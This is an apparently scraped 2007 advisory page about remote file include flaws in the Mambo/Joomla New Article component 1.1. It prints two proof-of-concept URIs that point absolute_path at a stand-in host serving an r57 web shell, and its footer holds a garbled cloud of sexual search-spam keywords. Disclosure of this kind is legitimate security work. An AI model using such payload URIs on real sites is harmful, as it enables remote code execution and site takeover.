about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Mambo/Joomla New Article Component Absolute_Path Multiple Remote File Include Vulnerabilities


Title Mambo/Joomla New Article Component Absolute_Path Multiple Remote File Include Vulnerabilities
Published 2007-04-16-12:00AM
Updated 2007-04-17-03:11AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Cold z3ro is credited with discovering these issues.
Vulnerable  Mambo New Article Component 1.1
Not Vulnerable  
Code   Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/joomla_path/components/com_articles.php?absolute_path=http://www.example2.com/r57.txt?
http://www.example.com/classes/html/com_articles.php?absolute_path=http://www.example2.com/r57.txt?
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 04 Dec 2008 21:37:17 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Priteve for sexy v www.asspor Sex hot as vedio sexy Login Dragomball sexe arabc CMS is Fre anarkali a for sex p PHP4 and P Trisha bat t207t shoutcast www.xxxfil serials.ws %...line.o Red Hat 8. indian sex www.lanqiu com_compro naked tabu MOVIS SEX Adultsex.c badjojo,co cheval sex Www.pictur t453t Searching Www.punyum t453t smf 1.1.4 www.trish Tamilvanam denim t2t lionel ric t2t Madonna se w w w .s e akh jooooo t81t Sexviodes sexymuvis netious Hot sexcom www.tamil t322t SEX PICTUE